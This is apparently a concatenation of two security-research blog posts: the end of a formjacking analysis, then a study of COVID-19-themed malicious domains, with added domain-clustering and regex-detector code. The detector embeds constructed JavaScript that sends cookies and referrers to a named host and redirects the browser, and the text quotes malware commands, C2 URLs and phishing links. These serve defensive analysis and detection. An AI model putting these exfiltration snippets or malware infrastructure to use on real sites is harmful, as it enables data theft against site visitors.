So it would download the stage 3 code from hxxps://myxintad[.]com/js/content.js, but the URL is no longer accessible. While we cannot get its content, our previous analysis shows attackers can use powerful JavaScript to do lots of things:

    • Obfuscate and encrypt code.
    • Only put a downloader in a target website, and put the real malicious code in their own remote server. This allows attackers to change its content easily and decide when it is accessible.
    • Create multi-stage malware to make it more difficult to track, as in this case with stages 1 through 3; this can greatly frustrate researchers.

More Advanced Skills

Sometimes, malware authors use advanced techniques to make code difficult to debug. We use the hash below for this example. It is similar to the one analyzed above, but it has extra anti-debug code, shown obfuscated below.

(SHA256:981d0c4d7e1d9249f3c0f59021f02c171233a5259ebda20a671e13d474fb74ec)

The deobfuscated code is:

The code uses two techniques to make it hard to analyze:

  1. It checks if you are using Firebug debugger to debug code.
  2. It uses a JavaScript conditional operator to execute a different branch for each detection result. Sometimes malware even uses cascading conditional operators, like "condition1 ? aaa : (condition2 ? bbb : (condition3 ? ccc : ddd))", which makes it very hard to set a debugger breakpoint.

Conclusion

JavaScript is not a new technology; it has been in use for more than 20 years and is continuously updated. Today, most websites use JavaScript, and we believe JavaScript attacks like formjacking are becoming a trend.

To mitigate risks, online retailers and e-commerce sites are advised to patch all of their systems, components, and web plugins to avoid being compromised. Additionally, it's best practice to regularly conduct web content integrity checks offline to see if your pages were edited and had malicious JS code inserted by attackers. Lastly, make sure you're using strong passwords for your content management system (CMS) administrator accounts to make them less susceptible to brute-force attacks.

For consumers shopping on these sites, we recommend paying via the one-time payment option that's frequently offered (e.g., PayPal, Visa Secured, etc.) instead of your credit card whenever possible. If you believe your credit card information was stolen as a result of a recent online purchase, you should contact your bank to freeze or change your card immediately. Additionally, consider putting a freeze on your credit so that new accounts can't be opened using your personal information.

Palo Alto Networks customers are protected from this type of attack: WildFire detects and correctly identifies formjacking attacks as malicious and PANDB also identifies the URLs as malicious.

Acknowledgements

We would like to thank Kyle Wilhoit, Jen Miller Osborn and Mark Karayan for their advice and help with improving the blog.

IOCs


Studying How Cybercriminals Prey on the COVID-19 Pandemic

Executive Summary

With the spread of the coronavirus worldwide, interest is high in related topics. Accordingly, Unit 42 researchers found an immense increase in coronavirus-related Google searches and URLs viewed since the beginning of February. Cybercriminals are looking to profit from such trending topics, disregarding ethical concerns, and in this particular case preying on the misfortunes of billions.

To protect customers of Palo Alto Networks, Unit 42 researchers monitor user interest in trending topics and newly registered domain names related to these topics, as miscreants often leverage them for malicious campaigns. Accompanying the growth in user interest, we observed a 656% increase in the average daily coronavirus-related domain name registrations from February to March. In this timeframe, we witnessed a 569% growth in malicious registrations, including malware and phishing, and a 788% growth in "high-risk" registrations, including scams, unauthorized coin mining, and domains that have evidence of association with malicious URLs within the domain or utilization of bulletproof hosting. As of the end of March, we identified 116,357 coronavirus-related newly registered domain names. Out of these, 2,022 are malicious and 40,261 are "high-risk".

We analyzed these domains by clustering them based on their Whois information, DNS records and screenshots (collected by our automated crawlers) to detect registration campaigns. We found that while many domains are registered to be resold for a profit, a significant fraction of them are used both for well-known malicious activities and for fraudulent shops selling items in short supply. Traditional malicious activity abusing coronavirus trends includes domains hosting malware, phishing sites, fraudulent sites, malvertising, cryptomining, and black hat Search Engine Optimization (SEO) for improving search rankings of unethical websites. Interestingly, although many webshops that use newly registered domains try to scam users, we detected an especially unethical cluster of domains capitalizing on users' fear of coronavirus to further frighten them into buying their products. Moreover, we discovered a group of coronavirus-themed domains which now serve parked pages with high-risk JavaScript that may at any time start redirecting users to malicious content.

In this blog, we first showcase the increasing trend of user interests in coronavirus-related topics on the Internet, with data from both Google Trends and our service traffic logs. Second, we illustrate the significant increase in domain registration activities recently for domain names containing coronavirus-related keywords. Third, we present a detailed case study on how cybercriminals are abusing and monetizing such user interests on the Internet. Finally, we conclude with a discussion of best practices.

Note that all the malicious websites and malware attacks mentioned in this blog have been covered ahead of time by various security service offerings of Palo Alto Networks, including URL Filtering, DNS Security, WildFire, and Threat Prevention.

Increase in User Interest of Coronavirus-related Topics

Figure 1. Trend of users searching coronavirus related keywords

Using Google Trends and our traffic logs, we observed a steep increase in user interest in topics related to coronavirus. In Figure 1, we can see how interested users are in coronavirus-related keywords based on Google Trends. In particular, we see three prominent peaks at the end of January, the end of February, and the middle of March 2020. The first peak aligns with the virus outbreak in China, the second peak signifies the first US case of unknown origin, and the third peak is at the same time as the virus outbreak in the US. One interesting exception in Figure 1 is alcohol, as users have an interest in it all year round, with a peak at Christmas. Intuitively, the year-round interest in alcohol is for drinking it; however, the peaks aligned with coronavirus are for medical alcohol.

Figure 2. Trend of users visiting coronavirus related URLs

Matching our observations about user interest from Google Trends, we see in Figure 2 a near ten-fold increase in the number of unique coronavirus-related URLs visited by our customers comparing early February to late March.

The increased user interest in coronavirus presents a lucrative opportunity for cybercriminals to profit from this pandemic. A common method for crooks to benefit from trending topics is to register domain names that include related keywords, such as “coronavirus” or “COVID”. These domain names often host legitimate-looking content and are used for a wide variety of malicious activities, including tricking users into downloading malicious files, phishing, scams, malvertisement and cryptocurrency mining.

To combat criminals employing coronavirus-related domain names, we obtain keywords from trending topics. First, we automatically extract keywords using the Google Trends API. Then we manually select the keywords most relevant to coronavirus. Finally, using our set of keywords, we closely monitor newly registered coronavirus-related domain names.

The Rise of Coronavirus Domain Names

Unit 42 has been tracking newly registered domains (NRDs) for more than nine years and has previously published a comprehensive analysis of them. To study the emerging threats abusing COVID-19, we retrieved NRDs containing coronavirus-related keywords from January 1, 2020 to March 31, 2020. Our system detected 116,357 related NRDs during this period, with roughly 1,300 domains every day. Figure 3 presents the daily trend of new domain name registrations detected during our study period. We found an increase in the number of coronavirus domains over time, and after March 12, we detected over 3,000 new domains every day. Apart from the general trend of growth, we also observed sudden increases in the number of domains registered. These increases in registrations follow the peaks in user interest seen in Google Trends with a few days of delay.

Figure 3. Daily coronavirus-related domain registration trends

We used Palo Alto Networks’ threat intelligence, including our DNS Security service and URL Filtering service, to evaluate coronavirus-related NRDs. We classify NRDs into two categories. First, malicious NRDs include domains used for command and control (C2), malware distribution and phishing. Second, high-risk NRDs contain scam pages, pages with insufficient content, coin miners, and domains associated with known malicious or bulletproof hosting. While in this blog, we separate our categorization into malicious and high-risk, URL Filtering service provides our customers a more fine-grained categorization of domain names as described in this document.

During our analysis, we identified 2,022 malicious and 40,261 high-risk NRDs. The malicious rate is 1.74% and the high-risk rate is 34.60%. Among the malicious domains, 15.84% are involved in phishing attacks trying to steal users' credentials, and 84.09% are hosting different kinds of malware, including Trojans and info stealers. Unlike phishing and malware, we only found a couple of domains used for C2 communication.

Supporting our previous observations, the increase in the average daily number of coronavirus-related domains from February to March is 656%. We witness a similar trend of malicious and high-risk coronavirus domains, with 569% and 788% growth, respectively. In Figure 3, we can observe that malicious registrations follow NRD trends, in some cases even exceeding them.

Figure 4. Daily customer DNS query trends related to coronavirus

Additionally, we find that even though these domains were recently registered, we have observed, in total, 2,835,197 DNS queries (caching excluded) for these domains according to the Passive DNS data that we collect. Furthermore, an average malicious NRD is queried 88% more than an average non-malicious NRD, which aligns with attackers' incentives to utilize their domains before they get blacklisted. Figure 4 shows the daily trends of DNS queries observed in our Passive DNS database using a seven-day moving average. We notice a steep increase on March 16 in the number of benign and malicious NRDs queried. This increase correlates to our previous observation of user interest and domain registrations peaking a few days before due to the virus outbreak in the US.

Figure 5. Most abused keywords in NRD

The keyword set we use for our analysis contains terms specific to the coronavirus pandemic like “coronavirus” and “COVID-19”. We also leverage more general ones such as “pandemic” and in addition to words directly related to the virus, we also include keywords related to supplies running out, such as “facemask” and “sanitizer”.

In Figure 5, we list the top 15 keywords which matched the most NRDs. In general, the specific terms are more favorable for registrants, and there are several registration campaigns for related supplies. Apart from the detection count, these popular keywords have risk levels above average (>40% high-risk rate), which means they’re more likely to be abused. On the other hand, their malicious rate is similar to average keywords. A special case is “virusnews” matching 344 NRDs, where 33% of them are malicious.

How Attackers Are Abusing the Coronavirus Pandemic

Observing the increase in malicious and high-risk coronavirus NRDs, we analyzed these domains further to understand how cybercriminals utilize them. We start by clustering domain names based on Whois information and DNS records, including registration date, registrar, registrant's organization, Autonomous System Number (ASN) and name service provider. Additionally, we cluster domain names based on their main webpage's visual similarity. We employ the k-nearest neighbor algorithm using the last layer of the DenseNet 201 model from the Keras library as features. Building on our clusters, we found several malicious or abusive registration campaigns, which we will discuss alongside typical scenarios of malicious use cases.

Phishing User Credentials with Coronavirus Domains

The goal of phishing attacks is to trick users into sharing their credentials and personal information with the attackers. Among coronavirus domains, we observe classic phishing schemes where attackers send an email to our customers with a link to a fake website mimicking a legitimate brand’s or service’s website to fool users into giving away their login credentials.

Figure 6. Domain corona-masr21[.]com hosting a Bank of America phishing page

We detected a cluster of 20 domains registered on the same day following the corona-masr*.com pattern, where * is a number anywhere from 1 to 101. While there are 101 possible domain name variations in this range, only 20 were registered. In Figure 6, we see an example of a phishing URL hxxp[:]//corona-masr21[.]com/boa/bankofamerica/login.php targeting Bank of America. The goal of attackers is to persuade users that they need to login on this fake webpage and that the bank owns it. This cluster also includes phishing URLs imitating other services including http[:]//corona-masr21[.]com/apple-online targeting Apple's login page and hxxps[:]//corona-masr3[.]com/CAZANOVA%20TRUE%20LOGIN%20SMART%202019/ targeting PayPal's login pages. Another phishing campaign was targeting Outlook accounts from the corona-virusus[.]com and coronavirus-meds[.]com domains.
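As an added example that is not code from the original post, the following Node.js script applies the keyword monitoring of newly registered domains described earlier to a constructed NRD feed, then collapses numbered names into templates so that a campaign like the corona-masr*.com cluster above surfaces as one group together with the range of numbers observed. The keyword list and the domain feed are constructed for illustration, not real registration data.

```javascript
// Added example (not from the original post): keyword triage of a newly registered domain
// (NRD) feed, then grouping matches into registration templates so numbered campaigns such
// as corona-masr<N>.com stand out. Keyword list and feed are constructed for illustration.
const KEYWORDS = ["coronavirus", "covid", "corona", "pandemic", "facemask", "sanitizer", "virusnews"];

// Keywords found in the domain name, in KEYWORDS order (case-insensitive substring match).
function matchKeywords(domain, keywords = KEYWORDS) {
  const name = domain.toLowerCase();
  return keywords.filter((k) => name.includes(k));
}

// Collapse every digit run into "*" so corona-masr21.com and corona-masr3.com share a template.
function template(domain) {
  return domain.toLowerCase().replace(/\d+/g, "*");
}

// For members whose name carries exactly one number, report the numeric range observed
// (the article notes corona-masr*.com used numbers between 1 and 101, with 20 registered).
function numericRange(members) {
  const nums = members
    .map((d) => (d.match(/\d+/g) || []).map(Number))
    .filter((a) => a.length === 1)
    .map((a) => a[0]);
  if (nums.length === 0) return null;
  return { min: Math.min(...nums), max: Math.max(...nums), seen: nums.length };
}

// Keep only keyword-matching NRDs, group them by template, and return groups of at least
// minSize members, largest first.
function findCampaigns(domains, minSize = 2) {
  const groups = new Map();
  for (const d of domains) {
    if (matchKeywords(d).length === 0) continue;
    const t = template(d);
    if (!groups.has(t)) groups.set(t, []);
    groups.get(t).push(d);
  }
  return [...groups.entries()]
    .filter(([, members]) => members.length >= minSize)
    .map(([tpl, members]) => ({ template: tpl, count: members.length, members, range: numericRange(members) }))
    .sort((a, b) => b.count - a.count);
}

// Constructed NRD feed (not real registrations).
const SAMPLE_NRDS = [
  "corona-masr3.com", "corona-masr21.com", "corona-masr57.com", "corona-masr101.com",
  "coronavirus-meds.com", "corona-virusus.com", "selectsanitizer.com",
  "mybakery2020.com", "covid19center.online", "covid19-help1.xyz", "covid19-help2.xyz",
];

console.log(JSON.stringify(findCampaigns(SAMPLE_NRDS), null, 2));
```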

In addition, we found that those domains serving phishing pages also host zipped files with their malicious source artifacts. Those include the HTML and PHP source code of phishing "front-ends" (corona-masr4[.]com/test.zip), as well as code to send out spam emails and filter out requests from benign web crawlers (corona-virusus[.]com/OwaOwaowa.zip). It is common practice for malicious campaigns to host and distribute packed versions of malicious payloads, which can be downloaded by a dropper on another compromised website.

Figure 7. Bank of America’s legitimate website

Users can check three main indicators, shown in Figure 7, to ensure they are not the victim of a phishing attack. First, they need to make sure that the domain portion of the URL is the expected domain name owned by the service where they try to log in. Second, users need to make sure that there is a lock icon on the top-left side, signifying that they are connected via a valid HTTPS connection, therefore preventing man-in-the-middle (MiTM) attacks. Finally, users can verify if the domain name matches the owner of the certificate.

Coronavirus Domains Hosting Malicious Executables

Many newly-registered COVID-19 domains were identified as being associated with malware activity. One such domain, covid-19-gov[.]com, warrants special attention, as it is consistent with similar RedLine Stealer activity previously reported by Proofpoint.

Although the initial infection vector utilized to direct potential victims to the above site remains unclear, Unit 42 researchers identified a RedLine Stealer sample being hosted at the URL covid-19-gov[.]com within a ZIP file. When the contents of the ZIP file were extracted, the RedLine Stealer binary was revealed to have the filename Covid-Locator.exe.

When executed, the sample first opens Internet Explorer and attempts a connection to hxxp://localhost:14109. It then initiates an HTTP POST request to the URL hxxp://45.142.212[.]126:6677/IRemotePanel, which is consistent with RedLine Stealer check-in behaviors. After the check-in is made and the remote C2 server issues an HTTP 200 OK response, data exfiltration from the host begins:

Figure 8. Network traffic from RedLine Stealer data exfiltration

Of particular note is the use of the URL hxxp://tempuri[.]org/IRemotePanel/SendClientInfo in the SOAPAction HTTP header field. The domain tempuri[.]org is not directly related to the malicious activity, but is a standard default placeholder domain for web services in development. According to established web service implementation best practices, this field should be updated to reflect an appropriate namespace so that a given web service can be uniquely distinguished and identified. That said, this detail is occasionally overlooked by even legitimate web services, and thus tempuri[.]org should not be considered an IOC for the purposes of threat identification.

Other interesting host-based behaviors of this RedLine Stealer variant include the execution of this command in a hidden command prompt window:

cmd.exe" /C taskkill /F /PID <RedLine Stealer PID> && choice /C Y /N /D Y /T 3 & Del ""

Based on the contents of the command, it can be inferred that the intent of the malware author was to ensure that, when executed via cmd.exe, this command would kill the running instance of the RedLine Stealer malware via its process identifier (PID), initiate the deletion of the directory in which the RedLine Stealer malware was present, and attempt to answer the deletion prompt programmatically with a Y response. However, there are two problems with this approach. First, the concept does not appear to be sound to begin with: using the choice command for this purpose will not produce the desired result. Second, while the command in its current state does kill the running instance of the malware and initiates a choice of Y (which is then automatically selected after three seconds have elapsed, as per the /T switch of the command), it offers this choice before the file deletion prompt appears. This means that even if choice could be used in this way, it still wouldn't work.

Additionally, this RedLine Stealer variant does not appear to generate additional malicious files on disk, create/alter any mutexes, or attempt to establish host-based persistence.

In addition to RedLine Stealer, we also detected other examples of malware delivery using coronavirus domains. Another such example, hosted at corona-map-data[.]com/bin/regsrtjser346.exe, was identified as the Danabot banking Trojan.

We also identified several instances of coronavirus-themed malware intended to victimize mobile users. Specifically, we identified three malicious Android applications on the domain Corona-virusapps[.]com served from URLs matching the schema Corona-virusapps[.]com/s<1-3>/CoronaVirus-apps.apk.

We also identified two others at coronaviruscovid19-information[.]com/it/corona.apk, and coronaviruscovid19-information[.]com/en/corona.apk, respectively.

All aforementioned APKs were identified as generic Trojans.

While a full in-depth analysis of the Danabot sample and the various APKs is beyond the scope of this blog, we have included additional relevant details in the IOC section.

Coronavirus Domains for C2 Communication

C2 domains are used by malware to “phone home” for receiving commands as well as for data exfiltration. While cybercriminals are mainly using coronavirus-related domains for malware, phishing, and scams, we also observe cases where they are involved in C2 communication.

Figure 9. NATsupport network communication

The domain covidpreventandcure[.]com is used by a malicious NATSupportManager remote access tool (RAT) sample. From the network traffic shown in Figure 9, we see that the domain resolves to 5.181.156[.]14. The sample then sends multiple POST requests to hxxp://5.181.156[.]14/fakeurl.htm as well as TCP packets to port 443. As shown in Figure 10, the POST communication is based on HTML forms: the C2 server attaches the encoded command and payload to a form in the HTTP response, while the Trojan sends out the encoded stolen data.

Figure 10. HTML form communication

covidpreventandcure[.]com was registered on March 26. We started observing related DNS traffic two days later, and it was active until April 11. There was a significant increase in DNS traffic resolving this domain in April, indicating a possible spike in related compromises. The Trojan also tried to resolve another, unregistered COVID-19 domain, covidwhereandhow[.]xyz, which is likely in preparation for future attacks.

Another COVID-19 domain observed in use by malware was coronavirusstatus.space. This domain was associated with an AzoRult downloader purporting to be a global COVID-19 tracking application.

Scam Webshops Advertising Short Supply Items

We identified several high-risk domain registrations where miscreants create fake webshops and try to scam users into buying short-supply items. There are many indicators of fraudulent webshops that users can use as clues to avoid becoming victims. For example, these webshops often advertise deals that are too good to be true in the current coronavirus pandemic; that is, they offer high-demand items like face masks or hand sanitizers at a discounted price. If we additionally find that the webshop is new, then it is time to look for more clues. Additional example indicators include pressing users to purchase immediately or miss the deal, fake reviews, fake contact information, cut-and-pasted text on the webshops, grammatical errors, and keyword-stuffed pages.

Figure 11. allsurgicalfacemask[.]com scam website

A particular group registered two domains, allsurgicalfacemask[.]com and surgicalfacemaskpharmacyonline[.]com. These sites advertise facemasks in high demand. The only differences between the two sites are the contact information used and the fake user testimonials.

When visiting these scam websites, our suspicion starts when they claim to have been operating since 1996, as illustrated in Figure 11. However, we find both domains are only one month old, coinciding with the rise of the coronavirus pandemic. Next, we observe a mismatch in country and domain registration information. The domain names are registered in India, while one website has an address and phone number for France. The other site has an address in Germany, but the phone number is in the US.

Searching for the German address “Mohrenstrasse 37 10117 Berlin”, we find it is actually a government building for the Federal Ministry of Justice and Consumer Protection in Berlin. The French address “6 Rue Boreau, 49100 Angers, France” appears to be a personal residence.

Figure 12. allsurgicalfacemask[.]com fake testimonials

Furthermore, we find poorly written, simple, and most likely fake testimonials on both pages following the same style of writing, as shown in Figure 12. A final clue is their preference to be contacted through the WhatsApp number "+33 752 56 3071", which is highly unusual for a well-established business operating since 1996.

Figure 13. selectsanitizer[.]com user reviews from before the domain was registered

Next, we find hard-to-get hand sanitizers offered on selectsanitizer[.]com for a discounted price, warranting further investigation. We encounter favorable user reviews about the sole item sold on this site. We discovered that some of the reviews, presented in Figure 13, date back to November 2019, while the domain was registered only in March 2020. Searching for the text of the newer reviews, we found that they were copied from other sites offering hand sanitizers, including an Amazon review. Finally, at checkout, the webshop alerted us that their stock is low, conveying a sense of urgency.

Card Skimmer Webshops

Figure 14. Example of a pandemic popular store with an embedded card skimmer

In addition to suspicious fraudulent stores on coronavirus-related domains, we detected web skimmer scripts on other stores which also sell pandemic-relevant goods. An example store www.sunrisepromos[.]com/promotional-personal-care-accessories/personalized-hand-sanitizer.html is shown in Figure 14.

These stores include credit card validation scripts with injected malicious code, which sends out your credit card information as soon as you finish typing it. An injected snippet is shown in Figure 15. Upon a page load, the script checks whether the page is a relevant checkout page by matching its URL against a list of regexes, and starts periodic attempts to collect and send an entered credit card number every 150 ms. In particular, it calls the function send, which first adds event listeners to form submit and button click events in order to collect entered inputs, and then checks the collected information against a regex for credit card numbers before sending it to a potentially compromised path at /js/index.php. Given that such websites are developed with the Magento framework, we suspect this to be a variation of Magecart skimmer implants. This activity is very similar to activity reported by Magento users on its customer forum in 2016.

Figure 15. Credit card skimmer code found on several websites selling pandemic-related goods

Feeding on Coronavirus Fears for Profit

Figure 16. survivecoronavirus[.]org scaring users into buying their survival book

Interestingly, we found a group of websites building on people's existing fears of coronavirus and trying to scare them further into buying their ebook, as shown in Figure 16. First, they play a disturbing video about the scariest situations and events related to coronavirus, then they advertise the book as the key to surviving this pandemic.

We found a cluster of eight domains registered to perpetrate this scam, including coronavirussecrets[.]com and pandemic-survival-coronavirus[.]com. When we attempted to buy their book, we landed on the site buygoods[.]com, a site with mixed reviews from customers on the San Diego Consumers' Action Network's and the Better Business Bureau's websites. The San Diego Consumers' Action Network article calls them info scammers, which it defines as "selling misleading or false information to consumers at inflated prices using fraudulent tactics". Additionally, many users report that they did not receive the item for which they paid.

Coronavirus Domains to Spread Classic Scams

Figure 17. Example of a technical support scam page on covid19center[.]online

Classic scam campaigns also take advantage of the popularity coronavirus domains have. For example, we detected a well-known technical support scam campaign served from coronavirusaware[.]xyz and covid19center[.]online, illustrated in Figure 17. For the past half a year, this scam campaign was seen on over 3,000 unique domains and IP addresses (using behavioral signatures described in this paper). The attackers aim to scare web users, make them call, and eventually get them involved in scam communication.

Another example is the WhatsApp fake "free internet" scam campaign, which was previously seen using different WhatsApp-related domains (such as whatsapp[.]version[.]gratis and whatsapp[.]cc0[.]co), but now uses internet-covid19.xyz. Interestingly, this campaign is reusing the same Google Analytics ID across its domains, UA-108418953-1 (more on tracking campaigns via analytics IDs can be found in this paper).

Illicit Pharmacies

Figure 18. anticovid19-pharmacy[.]com illicit pharmacy

Researchers have long studied illicit online pharmacies, and we found a cluster of three coronavirus domains hosting similar pharmacies, as shown in Figure 18: covid19-remedy[.]com, rxcovid[.]com and anticovid19-pharmacy[.]com. The same researchers have discussed that these pharmacies are unlicensed and leverage compromised websites to increase their placement in search results for keyword combinations such as "cheap viagra". Even worse, these pharmacies might sell drugs with incorrect and potentially dangerous doses. While the domain names suggest that these stores sell remedies for coronavirus, they mainly advertise Viagra and other drugs unrelated to the virus.

Abuse of Coronavirus Trends for Black Hat SEO

The increased interest in a topic can be leveraged to attract traffic for websites. Black hat SEO describes a collection of techniques used to artificially make a website appear on top of search engine results for certain keywords.

Figure 19. coronavirus-latest-update[.]info, which looks like a coronavirus informational page

We find a cluster of nine coronavirus-related domains used for black hat SEO. All of the domains host similar informational pages about coronavirus, like coronavirus-latest-update[.]info shown in Figure 19. However, these websites are not actual informational pages. First, we can observe many links to sharkroulette[.]com, a Bitcoin-based online casino. Second, even if we try to click on a link that promises to redirect to coronavirus-com[.]info, we will still be redirected to sharkroulette[.]com because JavaScript overrides the link targets.

Proactive Registrations of Suspicious Parked Pages

Figure 20. Example of a suspicious parked registration on coronavirus2day[.]com

As illustrated in Figure 20, we observe numerous suspicious parked pages hosted on newly registered coronavirus-themed domains. For example, one type of parked page was found on more than 200 unique coronavirus-themed domains. Such pages all load a potentially malicious JavaScript from a parent URL http[:]//cdn[.]dsultra[.]com/js/registrar.js.

A partial snippet of the script is shown below. Upon a page's load, the dL function is executed, which sends out a request with URL, Referrer, timestamp, and cookie information to hashtag.sslproviders[.]net (note, the particular subdomain was observed to change with reloads of the script). Then, it listens for a response in the bL function and will redirect the user's browser to any destination received by changing the parent.top.window.location.href value. Although in many of the observed cases it does not receive a new destination URL in the response, the script itself could ultimately serve as an arbitrary URL redirector for malicious purposes.

Figure 21. Partial snippet of a malicious redirector found over many coronavirus-themed parking domains

IP Loggers on Coronavirus Domains

Figure 22. coronavirus-game[.]ru serving IP loggers

Some content-rich coronavirus-related websites include suspicious scripts. A good example of such scripts are IP loggers; e.g., on coronavirus-game[.]ru (Figure 22), there is an obfuscated script which drops an invisible iframe that sends the user's IP address to the legitimate IP logging service iplogger[.]org.

Coronavirus Websites with (Dead) Cryptojacking Scripts

Figure 23. Unsuccessful in-browser cryptojacking on coronavirusinrealtime[.]com
Interestingly, we noticed that many of the new coronavirus websites, such as coronamasksupply[.]com and coronavirusinrealtime[.]com, embed "dead" in-browser coin mining code, as shown in Figure 23. Most use the outdated Coinhive service or obsolete Webminerpool and Crypto-Loot scripts, and as such fail to load the corresponding mining libraries or to establish a connection with a websocket endpoint that is no longer active. We suspect that these campaigns copy-paste intrusive code from their older websites without checking whether it still works. Similarly, even content-rich web pages that leverage the popularity of pandemic-related information run unsuccessful cryptojacking, receiving errors on websocket connections to obsolete mining endpoints.

In addition, we also found examples of working in-browser cryptojacking scripts. Examples include JSE-coin on coronashirts[.]store. We wrote more about intrusive coin miners one year ago in a previous blog.
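The three behaviours described above (cookie and referrer exfiltration feeding a top-level redirect, a hidden iframe pointing at an IP-logging service, and references to defunct in-browser mining services) can be triaged with a few paired regular expressions. The Python below is an added example written for this page, not code from the post or from any of the sites it names. The JavaScript snippets inside it are constructed to mimic the described behaviour, and the rule names and the scan_script / scan_all helpers are this example's own.

```python
import re

# Constructed JavaScript snippets modelled on the three behaviours described in
# this post (redirector, IP logger, dead miner). They are illustrations written
# for this example, not the scripts recovered from the sites named above.
SAMPLES = {
    "parked-redirector": """
        function dL() {
          var q = 'u=' + encodeURIComponent(location.href)
                + '&r=' + encodeURIComponent(document.referrer)
                + '&t=' + Date.now()
                + '&c=' + encodeURIComponent(document.cookie);
          xhr.open('GET', 'https://hashtag.sslproviders.net/?' + q);
          xhr.onload = function () { bL(xhr.responseText); };
          xhr.send();
        }
        function bL(dest) { if (dest) { parent.top.window.location.href = dest; } }
    """,
    "ip-logger": """
        var f = document.createElement('iframe');
        f.style.display = 'none';
        f.src = 'https://iplogger.org/abcd1';
        document.body.appendChild(f);
    """,
    "dead-miner": """
        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>var m = new CoinHive.Anonymous('SITE_KEY'); m.start();</script>
    """,
    "benign-counter": """
        document.getElementById('cases').innerText = stats.confirmed.toLocaleString();
    """,
}

# Each rule lists regexes that must ALL match for the rule to fire. Pairing an
# exfiltration pattern with a redirect (or hidden-iframe) pattern keeps the
# false-positive rate lower than any single indicator on its own.
RULES = [
    ("arbitrary-url-redirector", [
        r"document\.cookie",
        r"document\.referrer",
        r"(?:parent\.|top\.|window\.)+location\.href\s*=(?!=)",
    ]),
    ("hidden-iframe-ip-logger", [
        r"createElement\(\s*['\"]iframe['\"]\s*\)",
        r"display\s*=\s*['\"]none['\"]|visibility\s*=\s*['\"]hidden['\"]",
        r"iplogger\.org",
    ]),
    ("in-browser-coin-miner", [
        r"coinhive\.com|coin-hive\.com|crypto-loot\.com|webminerpool",
    ]),
]


def scan_script(source):
    """Return the names of all rules whose patterns all match somewhere in source."""
    return [name for name, patterns in RULES
            if all(re.search(p, source, re.IGNORECASE) for p in patterns)]


def scan_all(samples=SAMPLES):
    """Map each sample label to the list of rules it triggered."""
    return {label: scan_script(src) for label, src in samples.items()}


if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:20s} -> {hits or 'clean'}")
```

The miner rule deliberately fires on any reference to the named services, dead or alive: a page that still ships a Coinhive loader is worth a look regardless of whether the endpoint answers.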

Conclusion

Unfortunately, there will always be cybercriminals who attempt to victimize people during local, national, and world events when their fears are elevated. We have observed this same type of behavior time and time again: when calamitous events occur, cybercriminals start to circle for victims. Sadly, we do not expect this exploitative type of behavior to go away anytime soon.

In the case of coronavirus, we observed a steep increase in the number of coronavirus-related domain names registered every day, matching the rise of user interest in the pandemic. Worrisomely, we found a 569% increase in the average daily number of malicious coronavirus NRDs comparing February to March and a 788% increase for high-risk domains. Since January 1, we identified 2,022 malicious and 40,261 high-risk NRDs. We discovered that these domain names are employed for a wide variety of malicious purposes, including malware distribution, phishing attacks, scams, and black hat SEO.

People should be highly skeptical of any emails or newly registered websites with COVID-19 themes, whether they claim to have information, a testing kit, or a cure. Special care should be taken to examine domain names for legitimacy and security, such as ensuring it is the legitimate domain (google[.]com vs. g00gle[.]com) and that there is a lock icon on the left-hand side of the browser's URL bar, indicating a valid HTTPS connection. Similar care should be taken with any COVID-19 themed emails: a look at the sender's email address often reveals that the content is likely not legitimate, as the address is either unknown to the recipient, misspelled, or suspiciously long with random-seeming characters.

To protect users from cybercriminals, Palo Alto Networks' best practice recommendation for URL Filtering is to block access to the Newly Registered Domain category. However, if you cannot block access to the Newly Registered Domains category, our recommendation is to enforce SSL decryption on these URLs for increased visibility, block users from downloading risky file types such as PowerShell scripts and executables, apply a much stricter Threat Prevention policy, and increase logging when Newly Registered Domains are accessed. We also recommend DNS-layer protection, as we know over 80% of malware uses DNS to establish C2.

As for the threats and IOCs specifically outlined in this blog, the following steps have been taken to ensure optimal detection and prevention mechanisms within the Palo Alto Networks technology stack to the extent possible:

    • Domains, IP addresses, and URLs have been categorized appropriately.
    • Wildfire verdicts for all samples have been updated and/or verified.
    • Intrusion Prevention System signatures have been created, updated, and/or verified.
    • Cortex XDR detections have been deployed, updated, and/or verified.
    • Autofocus Tags have been created, updated, and/or verified.

Due to the suddenness of the coronavirus outbreak, many employees are self-isolating and working from home. While organizations have always provided secure access to their employees via VPN connections, the enormous number of employees requiring secure access is unprecedented and requires additional resources and capacity. Palo Alto Networks offers Prisma Access, a cloud-delivered secure access service edge (SASE) platform that provides consistent policy enforcement and security for remote offices and mobile users, and will scale up and down as business demands evolve.

To learn more about how Palo Alto Networks can help your remote employees, please see our resources here and check out Nir Zuk’s webcast on how to enable business continuity.

Acknowledgements

We would like to thank Shawn Huang, Wei Wang, Tao Yan and Wanjin Li for their help with providing some of the data sources necessary for our analysis. We would also like to extend our gratitude to Daiping Liu, Kelvin Kwan, Eddy Rivera, Mark Karayan, Zoltan Deak and Jen Miller Osborn for their advice and help with improving the blog.

IOCs

Credential Harvesting:
corona-masr21[.]com/boa/bankofamerica/login.php
corona-masr21[.]com/apple-online
corona-masr3[.]com/CAZANOVA%20TRUE%20LOGIN%20SMART%202019/
corona-virusus[.]com

Scams:
allsurgicalfacemask[.]com
surgicalfacemaskpharmacyonline[.]com
selectsanitizer[.]com
survivecoronavirus[.]org
facemasksus[.]com
coronavirussecrets[.]com
pandemic-survival-coronavirus[.]com
internet-covid19.xyz
coronavirusaware[.]xyz
covid19center[.]online
Whatsapp[.]version[.]gratis
whatsapp[.]cc0[.]co

Coinminers:
coronamasksupply[.]com
coronavirusinrealtime[.]com
coronashirts[.]store

Black Hat SEO:
coronavirus-latest-update[.]info
coronavirus-com[.]info
sharkroulette[.]com

Illicit pharmacy:
covid19-remedy[.]com
rxcovid[.]com
anticovid19-pharmacy[.]com

Other Suspicious Domains:
coronavirus2day[.]com
hashtag.sslproviders[.]net
coronavirus-game[.]ru
buygoods[.]com

Legitimate IP logging service:
Iplogger[.]org

Deployed Phishing Kits:
corona-masr4[.]com/test.zip
07bc3abcb6f3a7f7ec38f088068f5cefc953111e066b4dddc35cf43e836b215e
corona-virusus[.]com/OwaOwaowa.zip
c77c5df13430db98d0eaac6e593fc28e90df3f1ef6c48f81cc5681c67f91b4a8

Generic Android Trojans:
coronaviruscovid19-information[.]com/it/corona.apk
3d30b7df52672307b20beb1deb7b3b18e06edca63a6583d92125cba8329da107
coronaviruscovid19-information[.]com/en/corona.apk
